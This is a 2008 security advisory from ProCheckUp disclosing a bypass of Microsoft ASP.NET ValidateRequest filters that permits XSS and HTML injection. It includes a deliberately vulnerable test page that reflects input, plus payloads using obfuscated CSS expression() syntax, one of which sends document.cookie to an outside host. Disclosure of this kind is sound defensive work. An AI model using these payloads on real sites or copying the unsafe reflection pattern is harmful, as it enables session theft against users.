PR08-20: Microsoft ASP.NET ValidateRequest filters can be bypassed allowing XSS and HTML injection attacks

Date Found: 3rd October 2007

Date Public: 21st August 2008

Vendor contacted: 5th June 2008

Vendor response: 25th July 2008

The following statement from MSDN was forwarded by Microsoft:

"In summary, use, but do not fully trust, the ValidateRequest attribute and don't be too lazy. Spend some time to understand security threats like XSS at their roots and plan a defensive strategy centred on one key point - consider all user input evil."

Severity: Medium

Vulnerable:

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 R2 Standard Edition Build 3790.srv03_sp2_gdr.070304-2240 : Service Pack 2 (patched Aug 08) running Microsoft IIS 6.0 web server
- ASP.NET Version: 1.1.4322.2407 (fully patched)
- ASP.NET Version: 2.0.50727 (fully patched Aug 2008)
- Microsoft Internet Explorer 6.0.2800.1106
- Microsoft Internet Explorer 7.0.5730.13

Credits: Richard Brain of ProCheckUp Ltd.

Description:

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET ValidateRequest filters and perform XSS and HTML injection even against systems protected with the MS07-040 patch. This patch fixed the payload reported in ProCheckUp security bulletin PR07-03.

It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments.

Proof of concept:

In the following examples, 'test3.aspx' is a script that solely relies on ASP .NET ValidateRequest filters, and returns user-supplied input back to the browser.

<html>
<head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme'</script></head>
<body>
<form action="test3.aspx" method="get">
Your name: <input type="text" name="fname" size="20" />
<input type="submit" value="Submit" />
</form>
<%
dim fname
fname=Request.QueryString("fname")
If fname<>"" Then
Response.Write("Hello " & "<tagname " & fname & "!<br />")
Response.Write("How are you today?")
End If
%>
</body>
</html>

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target.foo/test3.aspx?fname=
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Cookie stealing
http://target.foo/test3.aspx?fname=
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=
"http://www.procheckup.com/?sid="%2bdocument.cookie)>

Consequences:

Attackers can potentially launch XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET ValidateRequest filters. Such code would run within the context of the target domain.

This type of attack can result in defacement of the target site, or the redirection of confidential information (i.e.: session IDs or passwords) to unauthorised third parties.

Fix: Please see vendor response.

References:

http://www.procheckup.com/Vulnerabilities.php
http://www.procheckup.com/PDFs/bypassing-dot-NET-ValidateRequest.pdf
http://msdn.microsoft.com/en-us/library/bb355989.aspx
http://msdn.microsoft.com/en-us/library/ms972969.aspx#securitybarriers_topic6

Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community
for the purpose of alerting them to problems, if and only if, the Bulletin is not edited
or changed in any way, is attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.